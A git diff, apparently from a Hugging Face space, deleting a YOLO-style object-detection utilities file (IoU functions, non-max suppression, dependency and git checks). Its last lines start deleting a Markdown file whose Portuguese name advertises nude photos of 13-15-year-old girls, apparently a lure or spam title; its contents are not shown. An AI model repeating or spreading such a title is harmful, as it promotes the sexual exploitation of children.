- -def init_seeds(seed=0): - # Initialize random number generator (RNG) seeds - random.seed(seed) - np.random.seed(seed) - init_torch_seeds(seed) - - -def get_latest_run(search_dir='.'): - # Return path to most recent 'last.pt' in /runs (i.e. 
to --resume from) - last_list = glob.glob(f'{search_dir}/**/last*.pt', recursive=True) - return max(last_list, key=os.path.getctime) if last_list else '' - - -def isdocker(): - # Is environment a Docker container - return Path('/workspace').exists() # or Path('/.dockerenv').exists() - - -def emojis(str=''): - # Return platform-dependent emoji-safe version of string - return str.encode().decode('ascii', 'ignore') if platform.system() == 'Windows' else str - - -def check_online(): - # Check internet connectivity - import socket - try: - socket.create_connection(("1.1.1.1", 443), 5) # check host accesability - return True - except OSError: - return False - - -def check_git_status(): - # Recommend 'git pull' if code is out of date - print(colorstr('github: '), end='') - try: - assert Path('.git').exists(), 'skipping check (not a git repository)' - assert not isdocker(), 'skipping check (Docker image)' - assert check_online(), 'skipping check (offline)' - - cmd = 'git fetch && git config --get remote.origin.url' - url = subprocess.check_output(cmd, shell=True).decode().strip().rstrip('.git') # github repo url - branch = subprocess.check_output('git rev-parse --abbrev-ref HEAD', shell=True).decode().strip() # checked out - n = int(subprocess.check_output(f'git rev-list {branch}..origin/master --count', shell=True)) # commits behind - if n > 0: - s = f"⚠️ WARNING: code is out of date by {n} commit{'s' * (n > 1)}. " \ - f"Use 'git pull' to update or 'git clone {url}' to download latest." - else: - s = f'up to date with {url} ✅' - print(emojis(s)) # emoji-safe - except Exception as e: - print(e) - - -def check_requirements(requirements='requirements.txt', exclude=()): - # Check installed dependencies meet requirements (pass *.txt file or list of packages) - import pkg_resources as pkg - prefix = colorstr('red', 'bold', 'requirements:') - if isinstance(requirements, (str, Path)): # requirements.txt file - file = Path(requirements) - if not file.exists(): - print(f"{prefix} {file.resolve()} not found, check failed.") - return - requirements = [f'{x.name}{x.specifier}' for x in pkg.parse_requirements(file.open()) if x.name not in exclude] - else: # list or tuple of packages - requirements = [x for x in requirements if x not in exclude] - - n = 0 # number of packages updates - for r in requirements: - try: - pkg.require(r) - except Exception as e: # DistributionNotFound or VersionConflict if requirements not met - n += 1 - print(f"{prefix} {e.req} not found and is required by YOLOR, attempting auto-update...") - print(subprocess.check_output(f"pip install '{e.req}'", shell=True).decode()) - - if n: # if packages updated - source = file.resolve() if 'file' in locals() else requirements - s = f"{prefix} {n} package{'s' * (n > 1)} updated per {source}\n" \ - f"{prefix} ⚠️ {colorstr('bold', 'Restart runtime or rerun command for updates to take effect')}\n" - print(emojis(s)) # emoji-safe - - -def check_img_size(img_size, s=32): - # Verify img_size is a multiple of stride s - new_size = make_divisible(img_size, int(s)) # ceil gs-multiple - if new_size != img_size: - print('WARNING: --img-size %g must be multiple of max stride %g, updating to %g' % (img_size, s, new_size)) - return new_size - - -def check_imshow(): - # Check if environment supports image displays - try: - assert not isdocker(), 'cv2.imshow() is disabled in Docker environments' - cv2.imshow('test', np.zeros((1, 1, 3))) - cv2.waitKey(1) - cv2.destroyAllWindows() - cv2.waitKey(1) - return True - except Exception as e: - print(f'WARNING: 
Environment does not support cv2.imshow() or PIL Image.show() image displays\n{e}') - return False - - -def check_file(file): - # Search for file if not found - if Path(file).is_file() or file == '': - return file - else: - files = glob.glob('./**/' + file, recursive=True) # find file - assert len(files), f'File Not Found: {file}' # assert file was found - assert len(files) == 1, f"Multiple files match '{file}', specify exact path: {files}" # assert unique - return files[0] # return file - - -def check_dataset(dict): - # Download dataset if not found locally - val, s = dict.get('val'), dict.get('download') - if val and len(val): - val = [Path(x).resolve() for x in (val if isinstance(val, list) else [val])] # val path - if not all(x.exists() for x in val): - print('\nWARNING: Dataset not found, nonexistent paths: %s' % [str(x) for x in val if not x.exists()]) - if s and len(s): # download script - print('Downloading %s ...' % s) - if s.startswith('http') and s.endswith('.zip'): # URL - f = Path(s).name # filename - torch.hub.download_url_to_file(s, f) - r = os.system('unzip -q %s -d ../ && rm %s' % (f, f)) # unzip - else: # bash script - r = os.system(s) - print('Dataset autodownload %s\n' % ('success' if r == 0 else 'failure')) # analyze return value - else: - raise Exception('Dataset not found.') - - -def make_divisible(x, divisor): - # Returns x evenly divisible by divisor - return math.ceil(x / divisor) * divisor - - -def clean_str(s): - # Cleans a string by replacing special characters with underscore _ - return re.sub(pattern="[|@#!¡·$€%&()=?¿^*;:,¨´><+]", repl="_", string=s) - - -def one_cycle(y1=0.0, y2=1.0, steps=100): - # lambda function for sinusoidal ramp from y1 to y2 - return lambda x: ((1 - math.cos(x * math.pi / steps)) / 2) * (y2 - y1) + y1 - - -def colorstr(*input): - # Colors a string https://en.wikipedia.org/wiki/ANSI_escape_code, i.e. 
colorstr('blue', 'hello world') - *args, string = input if len(input) > 1 else ('blue', 'bold', input[0]) # color arguments, string - colors = {'black': '\033[30m', # basic colors - 'red': '\033[31m', - 'green': '\033[32m', - 'yellow': '\033[33m', - 'blue': '\033[34m', - 'magenta': '\033[35m', - 'cyan': '\033[36m', - 'white': '\033[37m', - 'bright_black': '\033[90m', # bright colors - 'bright_red': '\033[91m', - 'bright_green': '\033[92m', - 'bright_yellow': '\033[93m', - 'bright_blue': '\033[94m', - 'bright_magenta': '\033[95m', - 'bright_cyan': '\033[96m', - 'bright_white': '\033[97m', - 'end': '\033[0m', # misc - 'bold': '\033[1m', - 'underline': '\033[4m'} - return ''.join(colors[x] for x in args) + f'{string}' + colors['end'] - - -def labels_to_class_weights(labels, nc=80): - # Get class weights (inverse frequency) from training labels - if labels[0] is None: # no labels loaded - return torch.Tensor() - - labels = np.concatenate(labels, 0) # labels.shape = (866643, 5) for COCO - classes = labels[:, 0].astype(np.int) # labels = [class xywh] - weights = np.bincount(classes, minlength=nc) # occurrences per class - - # Prepend gridpoint count (for uCE training) - # gpi = ((320 / 32 * np.array([1, 2, 4])) ** 2 * 3).sum() # gridpoints per image - # weights = np.hstack([gpi * len(labels) - weights.sum() * 9, weights * 9]) ** 0.5 # prepend gridpoints to start - - weights[weights == 0] = 1 # replace empty bins with 1 - weights = 1 / weights # number of targets per class - weights /= weights.sum() # normalize - return torch.from_numpy(weights) - - -def labels_to_image_weights(labels, nc=80, class_weights=np.ones(80)): - # Produces image weights based on class_weights and image contents - class_counts = np.array([np.bincount(x[:, 0].astype(np.int), minlength=nc) for x in labels]) - image_weights = (class_weights.reshape(1, nc) * class_counts).sum(1) - # index = random.choices(range(n), weights=image_weights, k=1) # weight image sample - return image_weights - - -def coco80_to_coco91_class(): # converts 80-index (val2014) to 91-index (paper) - # https://tech.amikelive.com/node-718/what-object-categories-labels-are-in-coco-dataset/ - # a = np.loadtxt('data/coco.names', dtype='str', delimiter='\n') - # b = np.loadtxt('data/coco_paper.names', dtype='str', delimiter='\n') - # x1 = [list(a[i] == b).index(True) + 1 for i in range(80)] # darknet to coco - # x2 = [list(b[i] == a).index(True) if any(b[i] == a) else None for i in range(91)] # coco to darknet - x = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 27, 28, 31, 32, 33, 34, - 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, - 64, 65, 67, 70, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 84, 85, 86, 87, 88, 89, 90] - return x - - -def xyxy2xywh(x): - # Convert nx4 boxes from [x1, y1, x2, y2] to [x, y, w, h] where xy1=top-left, xy2=bottom-right - y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) - y[:, 0] = (x[:, 0] + x[:, 2]) / 2 # x center - y[:, 1] = (x[:, 1] + x[:, 3]) / 2 # y center - y[:, 2] = x[:, 2] - x[:, 0] # width - y[:, 3] = x[:, 3] - x[:, 1] # height - return y - - -def xywh2xyxy(x): - # Convert nx4 boxes from [x, y, w, h] to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right - y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) - y[:, 0] = x[:, 0] - x[:, 2] / 2 # top left x - y[:, 1] = x[:, 1] - x[:, 3] / 2 # top left y - y[:, 2] = x[:, 0] + x[:, 2] / 2 # bottom right x - y[:, 3] = x[:, 1] + x[:, 3] / 2 # bottom 
right y - return y - - -def xywhn2xyxy(x, w=640, h=640, padw=0, padh=0): - # Convert nx4 boxes from [x, y, w, h] normalized to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right - y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) - y[:, 0] = w * (x[:, 0] - x[:, 2] / 2) + padw # top left x - y[:, 1] = h * (x[:, 1] - x[:, 3] / 2) + padh # top left y - y[:, 2] = w * (x[:, 0] + x[:, 2] / 2) + padw # bottom right x - y[:, 3] = h * (x[:, 1] + x[:, 3] / 2) + padh # bottom right y - return y - - -def xyn2xy(x, w=640, h=640, padw=0, padh=0): - # Convert normalized segments into pixel segments, shape (n,2) - y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) - y[:, 0] = w * x[:, 0] + padw # top left x - y[:, 1] = h * x[:, 1] + padh # top left y - return y - - -def segment2box(segment, width=640, height=640): - # Convert 1 segment label to 1 box label, applying inside-image constraint, i.e. (xy1, xy2, ...) to (xyxy) - x, y = segment.T # segment xy - inside = (x >= 0) & (y >= 0) & (x <= width) & (y <= height) - x, y, = x[inside], y[inside] - return np.array([x.min(), y.min(), x.max(), y.max()]) if any(x) else np.zeros((1, 4)) # xyxy - - -def segments2boxes(segments): - # Convert segment labels to box labels, i.e. (cls, xy1, xy2, ...) to (cls, xywh) - boxes = [] - for s in segments: - x, y = s.T # segment xy - boxes.append([x.min(), y.min(), x.max(), y.max()]) # cls, xyxy - return xyxy2xywh(np.array(boxes)) # cls, xywh - - -def resample_segments(segments, n=1000): - # Up-sample an (n,2) segment - for i, s in enumerate(segments): - x = np.linspace(0, len(s) - 1, n) - xp = np.arange(len(s)) - segments[i] = np.concatenate([np.interp(x, xp, s[:, i]) for i in range(2)]).reshape(2, -1).T # segment xy - return segments - - -def scale_coords(img1_shape, coords, img0_shape, ratio_pad=None): - # Rescale coords (xyxy) from img1_shape to img0_shape - if ratio_pad is None: # calculate from img0_shape - gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new - pad = (img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2 # wh padding - else: - gain = ratio_pad[0][0] - pad = ratio_pad[1] - - coords[:, [0, 2]] -= pad[0] # x padding - coords[:, [1, 3]] -= pad[1] # y padding - coords[:, :4] /= gain - clip_coords(coords, img0_shape) - return coords - - -def clip_coords(boxes, img_shape): - # Clip bounding xyxy bounding boxes to image shape (height, width) - boxes[:, 0].clamp_(0, img_shape[1]) # x1 - boxes[:, 1].clamp_(0, img_shape[0]) # y1 - boxes[:, 2].clamp_(0, img_shape[1]) # x2 - boxes[:, 3].clamp_(0, img_shape[0]) # y2 - - -def bbox_iou(box1, box2, x1y1x2y2=True, GIoU=False, DIoU=False, CIoU=False, eps=1e-7): - # Returns the IoU of box1 to box2. 
box1 is 4, box2 is nx4 - box2 = box2.T - - # Get the coordinates of bounding boxes - if x1y1x2y2: # x1, y1, x2, y2 = box1 - b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3] - b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3] - else: # transform from xywh to xyxy - b1_x1, b1_x2 = box1[0] - box1[2] / 2, box1[0] + box1[2] / 2 - b1_y1, b1_y2 = box1[1] - box1[3] / 2, box1[1] + box1[3] / 2 - b2_x1, b2_x2 = box2[0] - box2[2] / 2, box2[0] + box2[2] / 2 - b2_y1, b2_y2 = box2[1] - box2[3] / 2, box2[1] + box2[3] / 2 - - # Intersection area - inter = (torch.min(b1_x2, b2_x2) - torch.max(b1_x1, b2_x1)).clamp(0) * \ - (torch.min(b1_y2, b2_y2) - torch.max(b1_y1, b2_y1)).clamp(0) - - # Union Area - w1, h1 = b1_x2 - b1_x1, b1_y2 - b1_y1 + eps - w2, h2 = b2_x2 - b2_x1, b2_y2 - b2_y1 + eps - union = w1 * h1 + w2 * h2 - inter + eps - - iou = inter / union - - if GIoU or DIoU or CIoU: - cw = torch.max(b1_x2, b2_x2) - torch.min(b1_x1, b2_x1) # convex (smallest enclosing box) width - ch = torch.max(b1_y2, b2_y2) - torch.min(b1_y1, b2_y1) # convex height - if CIoU or DIoU: # Distance or Complete IoU https://arxiv.org/abs/1911.08287v1 - c2 = cw ** 2 + ch ** 2 + eps # convex diagonal squared - rho2 = ((b2_x1 + b2_x2 - b1_x1 - b1_x2) ** 2 + - (b2_y1 + b2_y2 - b1_y1 - b1_y2) ** 2) / 4 # center distance squared - if DIoU: - return iou - rho2 / c2 # DIoU - elif CIoU: # https://github.com/Zzh-tju/DIoU-SSD-pytorch/blob/master/utils/box/box_utils.py#L47 - v = (4 / math.pi ** 2) * torch.pow(torch.atan(w2 / h2) - torch.atan(w1 / h1), 2) - with torch.no_grad(): - alpha = v / (v - iou + (1 + eps)) - return iou - (rho2 / c2 + v * alpha) # CIoU - else: # GIoU https://arxiv.org/pdf/1902.09630.pdf - c_area = cw * ch + eps # convex area - return iou - (c_area - union) / c_area # GIoU - else: - return iou # IoU - - - - -def bbox_alpha_iou(box1, box2, x1y1x2y2=False, GIoU=False, DIoU=False, CIoU=False, alpha=2, eps=1e-9): - # Returns tsqrt_he IoU of box1 to box2. 
box1 is 4, box2 is nx4 - box2 = box2.T - - # Get the coordinates of bounding boxes - if x1y1x2y2: # x1, y1, x2, y2 = box1 - b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3] - b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3] - else: # transform from xywh to xyxy - b1_x1, b1_x2 = box1[0] - box1[2] / 2, box1[0] + box1[2] / 2 - b1_y1, b1_y2 = box1[1] - box1[3] / 2, box1[1] + box1[3] / 2 - b2_x1, b2_x2 = box2[0] - box2[2] / 2, box2[0] + box2[2] / 2 - b2_y1, b2_y2 = box2[1] - box2[3] / 2, box2[1] + box2[3] / 2 - - # Intersection area - inter = (torch.min(b1_x2, b2_x2) - torch.max(b1_x1, b2_x1)).clamp(0) * \ - (torch.min(b1_y2, b2_y2) - torch.max(b1_y1, b2_y1)).clamp(0) - - # Union Area - w1, h1 = b1_x2 - b1_x1, b1_y2 - b1_y1 + eps - w2, h2 = b2_x2 - b2_x1, b2_y2 - b2_y1 + eps - union = w1 * h1 + w2 * h2 - inter + eps - - # change iou into pow(iou+eps) - # iou = inter / union - iou = torch.pow(inter/union + eps, alpha) - # beta = 2 * alpha - if GIoU or DIoU or CIoU: - cw = torch.max(b1_x2, b2_x2) - torch.min(b1_x1, b2_x1) # convex (smallest enclosing box) width - ch = torch.max(b1_y2, b2_y2) - torch.min(b1_y1, b2_y1) # convex height - if CIoU or DIoU: # Distance or Complete IoU https://arxiv.org/abs/1911.08287v1 - c2 = (cw ** 2 + ch ** 2) ** alpha + eps # convex diagonal - rho_x = torch.abs(b2_x1 + b2_x2 - b1_x1 - b1_x2) - rho_y = torch.abs(b2_y1 + b2_y2 - b1_y1 - b1_y2) - rho2 = ((rho_x ** 2 + rho_y ** 2) / 4) ** alpha # center distance - if DIoU: - return iou - rho2 / c2 # DIoU - elif CIoU: # https://github.com/Zzh-tju/DIoU-SSD-pytorch/blob/master/utils/box/box_utils.py#L47 - v = (4 / math.pi ** 2) * torch.pow(torch.atan(w2 / h2) - torch.atan(w1 / h1), 2) - with torch.no_grad(): - alpha_ciou = v / ((1 + eps) - inter / union + v) - # return iou - (rho2 / c2 + v * alpha_ciou) # CIoU - return iou - (rho2 / c2 + torch.pow(v * alpha_ciou + eps, alpha)) # CIoU - else: # GIoU https://arxiv.org/pdf/1902.09630.pdf - # c_area = cw * ch + eps # convex area - # return iou - (c_area - union) / c_area # GIoU - c_area = torch.max(cw * ch + eps, union) # convex area - return iou - torch.pow((c_area - union) / c_area + eps, alpha) # GIoU - else: - return iou # torch.log(iou+eps) or iou - - -def box_iou(box1, box2): - # https://github.com/pytorch/vision/blob/master/torchvision/ops/boxes.py - """ - Return intersection-over-union (Jaccard index) of boxes. - Both sets of boxes are expected to be in (x1, y1, x2, y2) format. - Arguments: - box1 (Tensor[N, 4]) - box2 (Tensor[M, 4]) - Returns: - iou (Tensor[N, M]): the NxM matrix containing the pairwise - IoU values for every element in boxes1 and boxes2 - """ - - def box_area(box): - # box = 4xn - return (box[2] - box[0]) * (box[3] - box[1]) - - area1 = box_area(box1.T) - area2 = box_area(box2.T) - - # inter(N,M) = (rb(N,M,2) - lt(N,M,2)).clamp(0).prod(2) - inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) - torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2) - return inter / (area1[:, None] + area2 - inter) # iou = inter / (area1 + area2 - inter) - - -def wh_iou(wh1, wh2): - # Returns the nxm IoU matrix. wh1 is nx2, wh2 is mx2 - wh1 = wh1[:, None] # [N,1,2] - wh2 = wh2[None] # [1,M,2] - inter = torch.min(wh1, wh2).prod(2) # [N,M] - return inter / (wh1.prod(2) + wh2.prod(2) - inter) # iou = inter / (area1 + area2 - inter) - - -def box_giou(box1, box2): - """ - Return generalized intersection-over-union (Jaccard index) between two sets of boxes. 
- Both sets of boxes are expected to be in ``(x1, y1, x2, y2)`` format with - ``0 <= x1 < x2`` and ``0 <= y1 < y2``. - Args: - boxes1 (Tensor[N, 4]): first set of boxes - boxes2 (Tensor[M, 4]): second set of boxes - Returns: - Tensor[N, M]: the NxM matrix containing the pairwise generalized IoU values - for every element in boxes1 and boxes2 - """ - - def box_area(box): - # box = 4xn - return (box[2] - box[0]) * (box[3] - box[1]) - - area1 = box_area(box1.T) - area2 = box_area(box2.T) - - inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) - torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2) - union = (area1[:, None] + area2 - inter) - - iou = inter / union - - lti = torch.min(box1[:, None, :2], box2[:, :2]) - rbi = torch.max(box1[:, None, 2:], box2[:, 2:]) - - whi = (rbi - lti).clamp(min=0) # [N,M,2] - areai = whi[:, :, 0] * whi[:, :, 1] - - return iou - (areai - union) / areai - - -def box_ciou(box1, box2, eps: float = 1e-7): - """ - Return complete intersection-over-union (Jaccard index) between two sets of boxes. - Both sets of boxes are expected to be in ``(x1, y1, x2, y2)`` format with - ``0 <= x1 < x2`` and ``0 <= y1 < y2``. - Args: - boxes1 (Tensor[N, 4]): first set of boxes - boxes2 (Tensor[M, 4]): second set of boxes - eps (float, optional): small number to prevent division by zero. Default: 1e-7 - Returns: - Tensor[N, M]: the NxM matrix containing the pairwise complete IoU values - for every element in boxes1 and boxes2 - """ - - def box_area(box): - # box = 4xn - return (box[2] - box[0]) * (box[3] - box[1]) - - area1 = box_area(box1.T) - area2 = box_area(box2.T) - - inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) - torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2) - union = (area1[:, None] + area2 - inter) - - iou = inter / union - - lti = torch.min(box1[:, None, :2], box2[:, :2]) - rbi = torch.max(box1[:, None, 2:], box2[:, 2:]) - - whi = (rbi - lti).clamp(min=0) # [N,M,2] - diagonal_distance_squared = (whi[:, :, 0] ** 2) + (whi[:, :, 1] ** 2) + eps - - # centers of boxes - x_p = (box1[:, None, 0] + box1[:, None, 2]) / 2 - y_p = (box1[:, None, 1] + box1[:, None, 3]) / 2 - x_g = (box2[:, 0] + box2[:, 2]) / 2 - y_g = (box2[:, 1] + box2[:, 3]) / 2 - # The distance between boxes' centers squared. - centers_distance_squared = (x_p - x_g) ** 2 + (y_p - y_g) ** 2 - - w_pred = box1[:, None, 2] - box1[:, None, 0] - h_pred = box1[:, None, 3] - box1[:, None, 1] - - w_gt = box2[:, 2] - box2[:, 0] - h_gt = box2[:, 3] - box2[:, 1] - - v = (4 / (torch.pi ** 2)) * torch.pow((torch.atan(w_gt / h_gt) - torch.atan(w_pred / h_pred)), 2) - with torch.no_grad(): - alpha = v / (1 - iou + v + eps) - return iou - (centers_distance_squared / diagonal_distance_squared) - alpha * v - - -def box_diou(box1, box2, eps: float = 1e-7): - """ - Return distance intersection-over-union (Jaccard index) between two sets of boxes. - Both sets of boxes are expected to be in ``(x1, y1, x2, y2)`` format with - ``0 <= x1 < x2`` and ``0 <= y1 < y2``. - Args: - boxes1 (Tensor[N, 4]): first set of boxes - boxes2 (Tensor[M, 4]): second set of boxes - eps (float, optional): small number to prevent division by zero. 
Default: 1e-7 - Returns: - Tensor[N, M]: the NxM matrix containing the pairwise distance IoU values - for every element in boxes1 and boxes2 - """ - - def box_area(box): - # box = 4xn - return (box[2] - box[0]) * (box[3] - box[1]) - - area1 = box_area(box1.T) - area2 = box_area(box2.T) - - inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) - torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2) - union = (area1[:, None] + area2 - inter) - - iou = inter / union - - lti = torch.min(box1[:, None, :2], box2[:, :2]) - rbi = torch.max(box1[:, None, 2:], box2[:, 2:]) - - whi = (rbi - lti).clamp(min=0) # [N,M,2] - diagonal_distance_squared = (whi[:, :, 0] ** 2) + (whi[:, :, 1] ** 2) + eps - - # centers of boxes - x_p = (box1[:, None, 0] + box1[:, None, 2]) / 2 - y_p = (box1[:, None, 1] + box1[:, None, 3]) / 2 - x_g = (box2[:, 0] + box2[:, 2]) / 2 - y_g = (box2[:, 1] + box2[:, 3]) / 2 - # The distance between boxes' centers squared. - centers_distance_squared = (x_p - x_g) ** 2 + (y_p - y_g) ** 2 - - # The distance IoU is the IoU penalized by a normalized - # distance between boxes' centers squared. - return iou - (centers_distance_squared / diagonal_distance_squared) - - -def non_max_suppression(prediction, conf_thres=0.25, iou_thres=0.45, classes=None, agnostic=False, multi_label=False, - labels=()): - """Runs Non-Maximum Suppression (NMS) on inference results - - Returns: - list of detections, on (n,6) tensor per image [xyxy, conf, cls] - """ - - nc = prediction.shape[2] - 5 # number of classes - xc = prediction[..., 4] > conf_thres # candidates - - # Settings - min_wh, max_wh = 2, 4096 # (pixels) minimum and maximum box width and height - max_det = 300 # maximum number of detections per image - max_nms = 30000 # maximum number of boxes into torchvision.ops.nms() - time_limit = 10.0 # seconds to quit after - redundant = True # require redundant detections - multi_label &= nc > 1 # multiple labels per box (adds 0.5ms/img) - merge = False # use merge-NMS - - t = time.time() - output = [torch.zeros((0, 6), device=prediction.device)] * prediction.shape[0] - for xi, x in enumerate(prediction): # image index, image inference - # Apply constraints - # x[((x[..., 2:4] < min_wh) | (x[..., 2:4] > max_wh)).any(1), 4] = 0 # width-height - x = x[xc[xi]] # confidence - - # Cat apriori labels if autolabelling - if labels and len(labels[xi]): - l = labels[xi] - v = torch.zeros((len(l), nc + 5), device=x.device) - v[:, :4] = l[:, 1:5] # box - v[:, 4] = 1.0 # conf - v[range(len(l)), l[:, 0].long() + 5] = 1.0 # cls - x = torch.cat((x, v), 0) - - # If none remain process next image - if not x.shape[0]: - continue - - # Compute conf - x[:, 5:] *= x[:, 4:5] # conf = obj_conf * cls_conf - - # Box (center x, center y, width, height) to (x1, y1, x2, y2) - box = xywh2xyxy(x[:, :4]) - - # Detections matrix nx6 (xyxy, conf, cls) - if multi_label: - i, j = (x[:, 5:] > conf_thres).nonzero(as_tuple=False).T - x = torch.cat((box[i], x[i, j + 5, None], j[:, None].float()), 1) - else: # best class only - conf, j = x[:, 5:].max(1, keepdim=True) - x = torch.cat((box, conf, j.float()), 1)[conf.view(-1) > conf_thres] - - # Filter by class - if classes is not None: - x = x[(x[:, 5:6] == torch.tensor(classes, device=x.device)).any(1)] - - # Apply finite constraint - # if not torch.isfinite(x).all(): - # x = x[torch.isfinite(x).all(1)] - - # Check shape - n = x.shape[0] # number of boxes - if not n: # no boxes - continue - elif n > max_nms: # excess boxes - x = x[x[:, 4].argsort(descending=True)[:max_nms]] # sort by confidence - 
- # Batched NMS - c = x[:, 5:6] * (0 if agnostic else max_wh) # classes - boxes, scores = x[:, :4] + c, x[:, 4] # boxes (offset by class), scores - i = torchvision.ops.nms(boxes, scores, iou_thres) # NMS - if i.shape[0] > max_det: # limit detections - i = i[:max_det] - if merge and (1 < n < 3E3): # Merge NMS (boxes merged using weighted mean) - # update boxes as boxes(i,4) = weights(i,n) * boxes(n,4) - iou = box_iou(boxes[i], boxes) > iou_thres # iou matrix - weights = iou * scores[None] # box weights - x[i, :4] = torch.mm(weights, x[:, :4]).float() / weights.sum(1, keepdim=True) # merged boxes - if redundant: - i = i[iou.sum(1) > 1] # require redundancy - - output[xi] = x[i] - if (time.time() - t) > time_limit: - print(f'WARNING: NMS time limit {time_limit}s exceeded') - break # time limit exceeded - - return output - - -def strip_optimizer(f='best.pt', s=''): # from utils.general import *; strip_optimizer() - # Strip optimizer from 'f' to finalize training, optionally save as 's' - x = torch.load(f, map_location=torch.device('cpu')) - if x.get('ema'): - x['model'] = x['ema'] # replace model with ema - for k in 'optimizer', 'training_results', 'wandb_id', 'ema', 'updates': # keys - x[k] = None - x['epoch'] = -1 - x['model'].half() # to FP16 - for p in x['model'].parameters(): - p.requires_grad = False - torch.save(x, s or f) - mb = os.path.getsize(s or f) / 1E6 # filesize - print(f"Optimizer stripped from {f},{(' saved as %s,' % s) if s else ''} {mb:.1f}MB") - - -def print_mutation(hyp, results, yaml_file='hyp_evolved.yaml', bucket=''): - # Print mutation results to evolve.txt (for use with train.py --evolve) - a = '%10s' * len(hyp) % tuple(hyp.keys()) # hyperparam keys - b = '%10.3g' * len(hyp) % tuple(hyp.values()) # hyperparam values - c = '%10.4g' * len(results) % results # results (P, R, mAP@0.5, mAP@0.5:0.95, val_losses x 3) - print('\n%s\n%s\nEvolved fitness: %s\n' % (a, b, c)) - - if bucket: - url = 'gs://%s/evolve.txt' % bucket - if gsutil_getsize(url) > (os.path.getsize('evolve.txt') if os.path.exists('evolve.txt') else 0): - os.system('gsutil cp %s .' 
% url) # download evolve.txt if larger than local - - with open('evolve.txt', 'a') as f: # append result - f.write(c + b + '\n') - x = np.unique(np.loadtxt('evolve.txt', ndmin=2), axis=0) # load unique rows - x = x[np.argsort(-fitness(x))] # sort - np.savetxt('evolve.txt', x, '%10.3g') # save sort by fitness - - # Save yaml - for i, k in enumerate(hyp.keys()): - hyp[k] = float(x[0, i + 7]) - with open(yaml_file, 'w') as f: - results = tuple(x[0, :7]) - c = '%10.4g' * len(results) % results # results (P, R, mAP@0.5, mAP@0.5:0.95, val_losses x 3) - f.write('# Hyperparameter Evolution Results\n# Generations: %g\n# Metrics: ' % len(x) + c + '\n\n') - yaml.dump(hyp, f, sort_keys=False) - - if bucket: - os.system('gsutil cp evolve.txt %s gs://%s' % (yaml_file, bucket)) # upload - - -def apply_classifier(x, model, img, im0): - # applies a second stage classifier to yolo outputs - im0 = [im0] if isinstance(im0, np.ndarray) else im0 - for i, d in enumerate(x): # per image - if d is not None and len(d): - d = d.clone() - - # Reshape and pad cutouts - b = xyxy2xywh(d[:, :4]) # boxes - b[:, 2:] = b[:, 2:].max(1)[0].unsqueeze(1) # rectangle to square - b[:, 2:] = b[:, 2:] * 1.3 + 30 # pad - d[:, :4] = xywh2xyxy(b).long() - - # Rescale boxes from img_size to im0 size - scale_coords(img.shape[2:], d[:, :4], im0[i].shape) - - # Classes - pred_cls1 = d[:, 5].long() - ims = [] - for j, a in enumerate(d): # per item - cutout = im0[i][int(a[1]):int(a[3]), int(a[0]):int(a[2])] - im = cv2.resize(cutout, (224, 224)) # BGR - # cv2.imwrite('test%i.jpg' % j, cutout) - - im = im[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416 - im = np.ascontiguousarray(im, dtype=np.float32) # uint8 to float32 - im /= 255.0 # 0 - 255 to 0.0 - 1.0 - ims.append(im) - - pred_cls2 = model(torch.Tensor(ims).to(d.device)).argmax(1) # classifier prediction - x[i] = x[i][pred_cls1 == pred_cls2] # retain matching class detections - - return x - - -def increment_path(path, exist_ok=True, sep=''): - # Increment path, i.e. runs/exp --> runs/exp{sep}0, runs/exp{sep}1 etc. - path = Path(path) # os-agnostic - if (path.exists() and exist_ok) or (not path.exists()): - return str(path) - else: - dirs = glob.glob(f"{path}{sep}*") # similar paths - matches = [re.search(rf"%s{sep}(\d+)" % path.stem, d) for d in dirs] - i = [int(m.groups()[0]) for m in matches if m] # indices - n = max(i) + 1 if i else 2 # increment number - return f"{path}{sep}{n}" # update path diff --git a/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Fotos De Meninas De 13 14 15 Anos Nuasl.md b/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Fotos De Meninas De 13 14 15 Anos Nuasl.md deleted file mode 100644 index 82980beb5e216445b04dbebd312cbbb78b20bebc..0000000000000000000000000000000000000000 --- a/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Fotos De Meninas De 13 14 15 Anos Nuasl.md +++ /dev/null @@ -1,6 +0,0 @@ -

